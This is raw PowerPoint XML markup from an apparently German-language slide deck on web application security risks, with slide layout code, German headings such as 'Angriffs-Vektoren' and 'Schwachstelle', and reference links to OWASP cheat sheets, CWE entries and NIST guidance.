              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>nahme</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="1050" b="1" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> von Anwendungen</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="194702" y="6794462"/>
        <a:ext cx="1038287" cy="71810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2985171" cy="500273"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="106224" tIns="53112" rIns="106224" bIns="53112" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Datumsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3901501" y="2"/>
            <a:ext cx="2985171" cy="500273"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="106224" tIns="53112" rIns="106224" bIns="53112" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{46C0059F-706E-42AF-B504-DA4BA04161AF}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>19.11.2018</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Fußzeilenplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="9516788"/>
            <a:ext cx="2985171" cy="500273"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="106224" tIns="53112" rIns="106224" bIns="53112" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Foliennummernplatzhalter 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3901501" y="9516788"/>
            <a:ext cx="2985171" cy="500273"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="106224" tIns="53112" rIns="106224" bIns="53112" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{91832A97-7139-43D2-8F8B-094A116E151F}" type="slidenum">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>‹Nr.›</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84872" cy="500936"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115063" tIns="57531" rIns="115063" bIns="57531" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3901702" y="4"/>
            <a:ext cx="2984872" cy="500936"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115063" tIns="57531" rIns="115063" bIns="57531" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6C875393-9CE0-40DD-A78A-34757A3496C9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/19/2018</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Image Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2144713" y="752475"/>
            <a:ext cx="2598737" cy="3756025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:prstClr val="black"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115063" tIns="57531" rIns="115063" bIns="57531" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Notes Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688817" y="4758891"/>
            <a:ext cx="5510530" cy="4508421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115063" tIns="57531" rIns="115063" bIns="575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6042"/>
            <a:ext cx="2984872" cy="500936"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115063" tIns="57531" rIns="115063" bIns="57531" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3901702" y="9516042"/>
            <a:ext cx="2984872" cy="500936"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="115063" tIns="57531" rIns="115063" bIns="57531" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{49E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹Nr.›</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1957876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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1258664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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1666177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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256569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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18473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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1251141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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1925794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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2099915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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21423801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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124098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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="531842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a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1467992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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16044898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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13180641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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4515024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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13413304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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16048625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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="846720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a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1943129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a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2374015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a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1892442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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28185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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1265144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a:t>Enter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" noProof="0"/>
              <a:t>Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7"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‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">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de-DE" sz="1400" b="1" noProof="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="de-DE" sz="1400" noProof="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2415579807"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836400" cy="2239082"/>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255">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27">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de-DE" sz="900" b="1" noProof="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Anwendungssp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a: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de-DE" sz="1100" b="1" noProof="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1100" b="1" baseline="0" noProof="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1100" b="1" noProof="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1100" b="1" baseline="0" noProof="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de-DE" sz="900" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Geschäftlich:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="600" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1050" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>?</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1" noProof="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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endParaRPr lang="de-DE" sz="1100" noProof="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de-DE" sz="1100" b="0" noProof="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de-DE" sz="1100" noProof="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108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de-DE" sz="1400" b="1" noProof="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="de-DE" sz="1400" noProof="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de-DE" sz="1600" b="1" noProof="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="de-DE" sz="1000" noProof="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de-DE" sz="1400" b="1" noProof="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="de-DE" sz="1400" noProof="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‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">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69253" y="1016525"/>
            <a:ext cx="6026747" cy="398276"/>
            <a:chOff x="69253" y="1034539"/>
            <a:chExt cx="6026747" cy="397661"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="69253" y="1034539"/>
              <a:ext cx="6026747" cy="397661"/>
              <a:chOff x="69253" y="1046882"/>
              <a:chExt cx="6026747" cy="397661"/>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bIns="10800" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="90000"/>
                  </a:lnSpc>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="950" b="1" noProof="0" err="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Auswir</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="950" b="1" noProof="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br>
                  <a:rPr lang="de-DE" sz="950" b="1" noProof="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de-DE" sz="950" b="1" noProof="0" err="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kungen</a:t>
                </a:r>
                <a:endParaRPr lang="de-DE" sz="950" b="1" noProof="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19" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="588788" y="1105375"/>
                <a:ext cx="139699" cy="305289"/>
                <a:chOff x="328" y="1565"/>
                <a:chExt cx="288" cy="625"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="28" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="376"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a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="472" y="1757"/>
                  <a:ext cx="0" cy="240"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1">
                    <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="30" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="328" y="1997"/>
                  <a:ext cx="144" cy="193"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1">
                    <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="31" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="472" y="1997"/>
                  <a:ext cx="144" cy="193"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1">
                    <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="32" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="328" y="1853"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1">
                    <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="69253" y="1046882"/>
                <a:ext cx="524432" cy="394113"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="36000" tIns="0" rIns="36000" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="90000"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="950" b="1" noProof="0" err="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Bedro-hungs</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="950" b="1" noProof="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br>
                  <a:rPr lang="de-DE" sz="950" b="1" noProof="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de-DE" sz="950" b="1" noProof="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quellen</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de-DE" sz="950" b="1" noProof="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Angriffs-</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="de-DE" sz="950" b="1" noProof="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Vektoren</a:t>
                </a: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tabLst>
                    <a:tab pos="182563" algn="l"/>
                  </a:tabLst>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="95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1" noProof="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Schwach-</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="de-DE" sz="950" b="1" noProof="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de-DE" sz="950" b="1" noProof="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stelle</a:t>
                </a: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792000" y="1253973"/>
                <a:ext cx="3420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 TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xm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Credential_Stuffing_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pages.nist.gov/800-63-3/sp800-63b.html#memsecret" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists/tree/master/Passwords" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Authentication_Cheat_Sheet"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OWASP_Automated_Threats_to_Web_Applications" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_authentication" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/384.html"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Testing_Identity_Management" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Session_Management_Cheat_Sheet"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User_Privacy_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_weak_Cryptography" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Bcrypt" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.xml"/><Relationship Id="rId21" 